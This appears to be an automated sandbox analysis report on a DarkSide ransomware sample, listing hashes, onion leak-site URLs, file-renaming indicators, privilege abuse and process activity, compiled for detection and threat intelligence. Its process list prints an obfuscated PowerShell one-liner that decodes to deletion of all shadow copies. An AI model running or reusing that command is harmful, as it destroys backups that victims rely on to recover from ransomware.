Analysis
-
max time kernel
14s -
max time network
12s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
29-05-2021 10:12
Static task
static1
Behavioral task
behavioral1
Sample
ut.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
ut.bin.exe
Resource
win10v20210410
General
-
Target
ut.bin.exe
-
Size
226KB
-
MD5
c81dae5c67fb72a2c2f24b178aea50b7
-
SHA1
4bd6437cd1dc77097a7951466531674f80c866c6
-
SHA256
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a
-
SHA512
30d63e080f37f34fb29fd46f8fb1572d79f645154a002c8da5914ae3d51e224bc60601f91f5d58ac2ce9f81d56a8ad467d7fde55d429ed269df3c196e6687b2c
Malware Config
Extracted
C:\\README.137cb6d5.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ut.bin.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff ut.bin.exe File renamed C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 ut.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
ut.bin.exepid process 1776 ut.bin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
ut.bin.exepowershell.exepid process 1776 ut.bin.exe 1776 ut.bin.exe 1776 ut.bin.exe 2040 powershell.exe 2040 powershell.exe 1776 ut.bin.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
ut.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1776 ut.bin.exe Token: SeSecurityPrivilege 1776 ut.bin.exe Token: SeTakeOwnershipPrivilege 1776 ut.bin.exe Token: SeLoadDriverPrivilege 1776 ut.bin.exe Token: SeSystemProfilePrivilege 1776 ut.bin.exe Token: SeSystemtimePrivilege 1776 ut.bin.exe Token: SeProfSingleProcessPrivilege 1776 ut.bin.exe Token: SeIncBasePriorityPrivilege 1776 ut.bin.exe Token: SeCreatePagefilePrivilege 1776 ut.bin.exe Token: SeBackupPrivilege 1776 ut.bin.exe Token: SeRestorePrivilege 1776 ut.bin.exe Token: SeShutdownPrivilege 1776 ut.bin.exe Token: SeDebugPrivilege 1776 ut.bin.exe Token: SeSystemEnvironmentPrivilege 1776 ut.bin.exe Token: SeRemoteShutdownPrivilege 1776 ut.bin.exe Token: SeUndockPrivilege 1776 ut.bin.exe Token: SeManageVolumePrivilege 1776 ut.bin.exe Token: 33 1776 ut.bin.exe Token: 34 1776 ut.bin.exe Token: 35 1776 ut.bin.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeBackupPrivilege 1828 vssvc.exe Token: SeRestorePrivilege 1828 vssvc.exe Token: SeAuditPrivilege 1828 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
ut.bin.exedescription pid process target process PID 1776 wrote to memory of 2040 1776 ut.bin.exe powershell.exe PID 1776 wrote to memory of 2040 1776 ut.bin.exe powershell.exe PID 1776 wrote to memory of 2040 1776 ut.bin.exe powershell.exe PID 1776 wrote to memory of 2040 1776 ut.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"1⤵
- Modifies extensions of user files
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
3e75df13a0f95661a9af769da5ce1f00
SHA181200a6da33299de3e68cf86bcf4c31c5bf0165a
SHA256cff3c1c628268eb8af674a5dadff5cb565e1ab2c13f69458401f7e5b08f95308
SHA51205be5cbe3e93b2574ea8854144601d3fcc320b4cc6fc6dd4feeb6827b2d61c729ba0cdacbaa3333daa492eaf88bf3b458cfe5f0e4470e60d3d0958fa632ef13c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
48a82b6753094950d9d3eacb72054bea
SHA1375ce7b97c9e51c022124c50b724fc3fd7c418ea
SHA2560cf4c9486a6b66bbede503837ab66024587ab3d556508918706320b59b2d32df
SHA5128d755fb2ca1a4461ba3dc4186dba4bd230a3035b1319e96ab5d0647337bbe27b1414fa04a6342a031334cfa0206062a80e632fc5e3c118f1b3bc10e5951a558f
-
memory/1776-66-0x0000000000290000-0x00000000002CC000-memory.dmpFilesize
240KB
-
memory/1776-60-0x0000000075C31000-0x0000000075C33000-memory.dmpFilesize
8KB
-
memory/1776-59-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/1776-67-0x0000000000200000-0x0000000000201000-memory.dmpFilesize
4KB
-
memory/2040-63-0x0000000001E30000-0x0000000001E31000-memory.dmpFilesize
4KB
-
memory/2040-65-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/2040-64-0x000000001AAC0000-0x000000001AAC1000-memory.dmpFilesize
4KB
-
memory/2040-68-0x000000001A9A0000-0x000000001A9A2000-memory.dmpFilesize
8KB
-
memory/2040-69-0x000000001A9A4000-0x000000001A9A6000-memory.dmpFilesize
8KB
-
memory/2040-70-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/2040-71-0x000000001B620000-0x000000001B621000-memory.dmpFilesize
4KB
-
memory/2040-72-0x000000001C560000-0x000000001C561000-memory.dmpFilesize
4KB
-
memory/2040-62-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmpFilesize
8KB
-
memory/2040-61-0x0000000000000000-mapping.dmp